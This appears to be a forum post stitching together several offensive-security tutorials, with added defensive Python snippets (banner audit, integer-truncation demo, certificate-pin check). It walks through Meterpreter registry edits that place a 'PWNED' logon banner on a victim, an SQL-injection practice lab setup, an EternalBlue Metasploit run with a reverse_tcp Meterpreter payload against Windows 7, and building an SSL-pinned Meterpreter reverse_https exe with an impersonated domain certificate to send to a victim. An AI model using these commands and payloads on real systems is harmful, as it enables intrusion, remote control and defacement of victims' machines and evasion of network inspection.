05-02-2020, 11:49 AM
This article shows how an attacker who already has a Meterpreter session can place a threatening message on the logon screen of a targeted Windows system.
Let’s start
Attacker: Kali Linux
Target: Windows 7
Read our previous article on how to hack Windows 7 and obtain a Meterpreter session on the victim. Meterpreter offers many post-exploitation options; type the following command to enumerate the relevant registry key on the victim's system:
reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System
From the screenshot, you can observe that the key contains 2 subkeys (Audit, UIPI) and 18 values. The highlighted box marks the two values we will target:
- legalnoticecaption
- legalnoticetext
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-wEM1Ov326sE/WSmvEHvqyjI/AAAAAAAAQEg/fgEMNgsXQw8gCOSpfwHG6CbW0z-3clrBACLcB/s1600/1.png?w=687&ssl=1)
Now type another command to assign the legalnoticecaption value, which provides the title or heading of the message shown on the logon screen:
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"
The screenshot shows that the registry value was set successfully.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-vVYyNZrERYY/WSmvDtg7BfI/AAAAAAAAQEY/vK2x9hodceMWzBTwEL4zHTsxEyM6csqagCEw/s1600/2.png?w=687&ssl=1)
Now type one more command to assign the legalnoticetext value, which holds the body of the message displayed on the victim's logon screen:
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"
The screenshot again shows that the registry value was set successfully.
Here -k denotes the key, -v the value name and -d the data to write.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-p1dX42wfstM/WSmvDrKtmEI/AAAAAAAAQEc/_xmxyMqAUy00Wo3vguMSJEFuTJ4B_YZkACEw/s1600/3.png?w=687&ssl=1)
Now, when the victim next starts the system, our message appears on the logon screen as shown in the screenshot below.
Try it yourself!!!
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-PSO9J9ct9pc/WSmvEyrHaLI/AAAAAAAAQEk/gs3UdF2-s0UBiQHkKYFfb-S7dhKLKh4VACEw/s1600/4.png?w=687&ssl=1)
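From the defender's side, the two values set above are a simple thing to audit: the logon banner under Policies\System should match whatever text the organisation has approved, and anything else is worth an alert. The following is an added example, not code from the original article. It parses constructed `reg query` output (the sample text and the approved-baseline strings are assumptions) and reports banner values that differ from the baseline.

```python
import re

# Constructed sample of `reg query` output for the Policies\System key; the
# two banner values mirror the ones the article sets, the rest are typical
# neighbours. This is not output captured from the page's target.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
    legalnoticecaption    REG_SZ    IMPORTANT MESSAGE
    legalnoticetext    REG_SZ    PWNED BY RAJ CHANDEL
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

# Assumed organisational baseline: the only banner text that is allowed.
APPROVED_BANNER = {
    "legalnoticecaption": "Authorised use only",
    "legalnoticetext": "This system is monitored.",
}

WATCHED = ("legalnoticecaption", "legalnoticetext")


def parse_reg_query(text):
    """Parse `reg query` output into {value_name_lower: (type, data)}.

    reg.exe indents each value line by four spaces and separates the name,
    type and data columns with runs of spaces. The data column may itself
    contain single spaces, so the split is capped at three fields."""
    values = {}
    for line in text.splitlines():
        if not line.startswith("    "):
            continue  # key path line or blank line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) < 2:
            continue
        name, vtype = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""  # empty REG_SZ
        values[name.lower()] = (vtype, data)
    return values


def audit_logon_banner(text, approved=APPROVED_BANNER):
    """Return [(value_name, data)] for banner values that are set but differ
    from the approved baseline; an empty list means nothing to report.
    Value names are compared case-insensitively because the registry is."""
    values = parse_reg_query(text)
    findings = []
    for name in WATCHED:
        if name not in values:
            continue
        _, data = values[name]
        if data and data != approved.get(name, ""):
            findings.append((name, data))
    return findings


if __name__ == "__main__":
    for name, data in audit_logon_banner(SAMPLE_REG_QUERY):
        print(f"ALERT: {name} set to unexpected text: {data!r}")
```

On a real host you would feed the script the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"`; running it from a scheduled job, or watching that key for changes, turns the attacker's visible prank into an early signal of a compromised machine.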
Hello everyone, today we'll be learning how to set up the Dhakkan lab (one of the best labs I have seen for practising and understanding SQL injection) on a current Ubuntu machine.
It is a laboratory that offers a complete test environment for anyone who wants to acquire or improve SQL injection skills. Let's start. First, we clone the SQLi lab repository inside the html directory with the following command:
git clone (repository URL not shown on this page)
Once the clone has finished, move the sqli-labs directory into /var/www/html and rename it to sqli. Inside the sqli directory is a sql-connections directory; run ls there and you will find a file named db-creds.inc.
We need to make some changes to this config file, using the following commands:
cd Sqli_Edited_Version/
ls
mv sqlilabs/ ../sqli
cd sqli
cd sql-connections/
ls
nano db-creds.inc
![[Image: 22.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-yxQJmIbVaqk/XNBYVDP1xeI/AAAAAAAAeQw/xvP4wn2bDkQpqQAh6gH8hTIPkLOFrqXvgCLcBGAs/s1600/22.png?w=687)
As we can see, the username is set to root and the password is left blank; we need to change both.
![[Image: 23.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-z6E-BER6UZI/XNBYVYLR8SI/AAAAAAAAeQ0/rimXANeL5F0E_5naNkpH-cA44KD7Oux7QCLcBGAs/s1600/23.png?w=687)
Here we set the username and password to raj:123, then save the file and exit.
![[Image: 24..png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-fQ2pqT27zr4/XNBYVp-ILpI/AAAAAAAAeQ4/QhEZkl0GUi0LmRBrS7k5PJG2VRwJImGvQCLcBGAs/s1600/24..png?w=687)
Now open the web application in a browser at localhost/sqli and click "Setup/reset Databases for labs".
![[Image: 25.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-qwZ34kkCbD8/XNBYVudQE3I/AAAAAAAAeQ8/L60e0iXQdBYHWtFuhqsIcInySw3ofjvGACLcBGAs/s1600/25.png?w=687)
Now the sqli lab is ready to use.
![[Image: 26.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-sW2mJaT06Bw/XNBYWBcn3mI/AAAAAAAAeRA/9WbM1qd-hdI_jK-cy8Smoirpc15YhEuZgCLcBGAs/s1600/26.png?w=687)
A page now opens in the browser listing the different kinds of SQLi challenges we can access.
![[Image: 27.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-403T-oGpSw4/XNBYWuzVZFI/AAAAAAAAeRI/kP6OltomyacVyI4Lggmn-Zte8BfG5DFlwCLcBGAs/s1600/27.png?w=687)
Click on lesson 1 and start the Sqli challenge.
![[Image: 28.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-llJnOGNDPgY/XNBYWW5_K2I/AAAAAAAAeRE/B7svXkR0Q94YCMbEFINfkU-A6rwsErFmACLcBGAs/s1600/28.png?w=687)
This module is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.
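The module description above pins the overflow on a size computation in which a DWORD is subtracted into a WORD. The following is an added example, not Metasploit's code and not a reproduction of srv.sys; the function names and the sample sizes are constructed. It shows the bug class in plain integer arithmetic: the same subtraction done on the full 32-bit field and on a 16-bit view of it, and the bounds check a parser should make before trusting any size it computed.

```python
MASK16 = 0xFFFF
MASK32 = 0xFFFFFFFF


def size_after_shrink_full_width(list_size, entry_size, converted_size):
    """Correct bookkeeping: the list size is a 32-bit field, and the
    difference between an entry's original and converted size is
    subtracted from the whole field."""
    shrink = entry_size - converted_size
    return (list_size - shrink) & MASK32


def size_after_shrink_low_word(list_size, entry_size, converted_size):
    """The bug class: the same subtraction is performed through a 16-bit
    view of the 32-bit field. Only the low WORD is updated (with
    wrap-around) and the high WORD keeps its old value, so the result can
    be far larger than the true size."""
    shrink = entry_size - converted_size
    high = list_size & ~MASK16 & MASK32
    low = ((list_size & MASK16) - shrink) & MASK16
    return high | low


def copy_is_safe(claimed_size, bytes_received):
    """Defensive check a parser must make before copying: a size it
    computed for a list can never exceed the bytes actually received.
    Comparing against received bytes, not against the attacker-supplied
    header field, is what catches the wrapped value."""
    return claimed_size <= bytes_received


def demo():
    """Constructed numbers: a 65,792-byte list in which one entry shrinks
    by 0x200 bytes during conversion."""
    list_size = 0x00010100
    entry_size, converted = 0x300, 0x100
    correct = size_after_shrink_full_width(list_size, entry_size, converted)
    buggy = size_after_shrink_low_word(list_size, entry_size, converted)
    return correct, buggy


if __name__ == "__main__":
    correct, buggy = demo()
    print(f"full-width result: {correct:#x}")   # smaller than the input, as expected
    print(f"low-word result:   {buggy:#x}")     # larger than the input: 0x200 wrapped
    print("copy from buggy size is safe:", copy_is_safe(buggy, 0x10100))
```

The point for reviewers of any length-handling code: when sizes stay below 0x10000 the two functions agree, so the defect is invisible in ordinary testing and only shows up on inputs large enough to cross the 16-bit boundary.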
Let’s start!!!
Attacker: Kali Linux
Target: Windows 7
Open a terminal in Kali Linux and type msfconsole to load the Metasploit framework.
msfconsole
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-6Juib7HFpqU/WSQlaI4r55I/AAAAAAAAQC0/saBl3C4NQ_0iGmOT2ZPqMddNRel1B5b6QCLcB/s1600/1.png?w=687&ssl=1)
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit
From the screenshot, you can see that we obtained a Meterpreter session once the buffer overflow overwrote the SMBv1 buffer.
meterpreter> sysinfo
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-nS0Zj8rB9UE/WSQlbBQuDrI/AAAAAAAAQC4/Jo24dMWfSgsw3RU41jehgfzvnXg-hi1uwCEw/s1600/2.png?w=687&ssl=1)
This article shows how an attacker can generate an SSL certificate for an exe or bat payload so that the Meterpreter connection with the host is established over a validated channel.
A firewall that inspects SSL verifies trusted certificates and inserts itself as a trusted third party into the session between client and server. When the client begins an SSL session with the server, the firewall captures the client's SSL request and forwards it to the server. The server sends back a certificate for the client, which the firewall captures. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by its Forward Trust certificate and forwards that duplicate to the client for authentication.
Meterpreter_Paranoid_Mode.sh lets you secure a staged or stageless Meterpreter connection by having the payload check the certificate of the handler it connects to.
Open a terminal in Kali Linux and type the following to download it:
git clone (repository URL not shown on this page)
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-4yTOrRiVEVU/WR_GslBBg2I/AAAAAAAAQA4/m-57V7W4-okcQnK7pDaQqjdGLAefKrLLQCLcB/s1600/1.png?w=687&ssl=1)
Once it has downloaded, run the script and follow the steps below.
Press Enter to continue
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ENn3ybkWcVw/WR_GtjOPrQI/AAAAAAAAQBA/mSec65tJnLAbQASHfJf4GvWVjafZ5EQKQCEw/s1600/2.png?w=687&ssl=1)
A prompt opens in which you choose the option for building the certificate; from the screenshot you can read that I chose to impersonate a domain.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-tH3qbHeoiiw/WR_Gtgc5vaI/AAAAAAAAQBE/uypLiisBwU8-nzvmTiFrnEACqQWrRTvhwCEw/s1600/3.png?w=687&ssl=1)
We start by generating a certificate in PEM format, once the certs have been created we can create an HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.
After that, another prompt opens asking for the domain name the SSL certificate will be generated for (the domain entered is not shown on this page).
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-siEXzO_b1Ao/WR_GuUtWw_I/AAAAAAAAQBI/b3USxrXfYUoE4FSB1lvW9i5KNC2KECExQCEw/s1600/4.png?w=687&ssl=1)
To have the connection validated, we tell the payload which certificate the handler will use by setting the path to the PEM certificate in the HANDLERSSLCERT option, then enable checking of that certificate by setting stagerverifysslcert to true.
PEM is a widely used encoding format for security certificates. Syntax and content are defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.
In the next prompt, choose the payload category for auto-building the payload; from the list I chose stageless (payload.exe).
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DeeaoEdboGs/WR_Gvuz52cI/AAAAAAAAQBM/RwB951FoivgxvkJUQwJspSUgRB6BoK15wCEw/s1600/5.png?w=687&ssl=1)
Once the payload is created, we need a handler to receive the connection, and again we point it at the PEM certificate so the handler can use its SHA1 hash for validation. Just as with the payload, we set HANDLERSSLCERT to the path of the PEM file and stagerverifysslcert to true.
We can see the stage performing the validation when a session comes back.
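The validation described in the last few paragraphs comes down to a pinned fingerprint: the payload carries the SHA1 hash of the handler's certificate and refuses any peer whose certificate hashes differently, which is exactly what defeats the re-signed duplicate an inspecting firewall would present. The block below is an added illustration of that check, not Metasploit's or the script's own code. The two "certificates" are constructed placeholder byte strings (not real X.509 structures), and the PEM framing follows the BEGIN/END CERTIFICATE marker convention the text refers to.

```python
import base64
import hashlib
import hmac
import re
import textwrap

# Constructed stand-in for the handler certificate the script writes to the
# output folder. The DER bytes are an arbitrary placeholder, not a real X.509
# structure, so the fingerprints below are illustrative only.
HANDLER_DER = bytes(range(64))
# A second, different "certificate", standing in for one that an
# interception device re-signs with its own CA.
IMPOSTER_DER = bytes(range(64, 128))

PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)


def der_to_pem(der):
    """PEM encoding: base64 body in 64-character lines between
    BEGIN/END CERTIFICATE marker lines."""
    body = "\n".join(textwrap.wrap(base64.b64encode(der).decode("ascii"), 64))
    return f"-----BEGIN CERTIFICATE-----\n{body}\n-----END CERTIFICATE-----\n"


def pem_to_der(pem):
    """Inverse: locate the CERTIFICATE block and base64-decode it strictly,
    so stray characters fail loudly instead of silently changing the hash."""
    m = PEM_BLOCK.search(pem)
    if not m:
        raise ValueError("no CERTIFICATE block found")
    return base64.b64decode("".join(m.group(1).split()), validate=True)


def sha1_fingerprint(pem):
    """Fingerprint of the DER bytes: this is what gets pinned at build time."""
    return hashlib.sha1(pem_to_der(pem)).hexdigest()


def stager_accepts(presented_pem, pinned_fingerprint):
    """The check stagerverifysslcert enables, in miniature: hash whatever
    certificate the peer presents and compare it, in constant time, with
    the fingerprint baked into the payload. A re-signed duplicate, however
    convincing its subject fields, hashes differently and is refused."""
    return hmac.compare_digest(sha1_fingerprint(presented_pem), pinned_fingerprint)


HANDLER_PEM = der_to_pem(HANDLER_DER)
IMPOSTER_PEM = der_to_pem(IMPOSTER_DER)
PINNED = sha1_fingerprint(HANDLER_PEM)   # embedded when the payload is built

if __name__ == "__main__":
    print("genuine handler accepted:  ", stager_accepts(HANDLER_PEM, PINNED))
    print("re-signed imposter accepted:", stager_accepts(IMPOSTER_PEM, PINNED))
```

The same idea cuts both ways for defenders: because the pin is a hash of the whole certificate rather than a chain-of-trust decision, an inspecting proxy cannot transparently open this traffic, so a pinned connection that still completes is a strong sign the endpoint is talking to its real handler and the TLS-inspection layer is being bypassed.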
Enter LHOST 192.168.0.108 (attacker’s IP)
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-kb48h98dc9A/WR_GwZsZ3sI/AAAAAAAAQBQ/ZNgxJffyJ0YSI_-6l6JcdtuZ1_I3iSlvACEw/s1600/6.png?w=687&ssl=1)
Similarly, enter any port for the reverse connection from the host system and press OK.
Enter lport 8888
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KH86JoulDsk/WR_Gw8ZxF-I/AAAAAAAAQBU/QuOY718Dy0UB3OFOvjj1BY209W6-pYwZACEw/s1600/7.png?w=687&ssl=1)
The list of payloads opens again; choose the desired payload from that prompt and it will be generated for the attack.
windows/meterpreter_reverse_https
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-iEaaajue4cg/WR_Gx9c04QI/AAAAAAAAQBg/bl2U8uhT230jybAwj9f6O3z5spiej5ApACEw/s1600/8.png?w=687&ssl=1)
This configures all the settings and starts the multi handler by launching the Metasploit framework.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-FNtqxoYNcns/WR_Gxg9wkTI/AAAAAAAAQBg/SQdpKVbpxcEFPrA_jH8q5a2kvORz84s2gCEw/s1600/9.png?w=687&ssl=1)
Inside the output folder you will find two files: the exe payload and the .pem certificate. Now share the exe file with your victim and wait for the Meterpreter session to be established.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-mrvKgOOevGY/WR_GsEeiAOI/AAAAAAAAQBg/MybaJ7yIKE4I_Dh17NqzkPWbmEoIxaz-ACEw/s1600/10.png?w=687&ssl=1)
You can also compare the generated .pem certificate with a genuine CA-signed certificate; in the image below, the certificate details shown for hackingarticles.in look just like those of a CA-signed certificate.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Mlrh4S1-45U/WR_Gsa1B3eI/AAAAAAAAQBg/zxJHKbETQBUiJe6qJF__GHEmfJm71Io3gCEw/s1600/11.png?w=687&ssl=1)
Hence you can see I have successfully established the meterpreter session with the victim’s system.
Try it by yourself!!!
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-duVHgbH01nY/WR_Gs-R6ijI/AAAAAAAAQBg/5M27D0mphh8yWWJjR0lguE1r1gxbQv6AgCEw/s1600/12.png?w=687&ssl=1)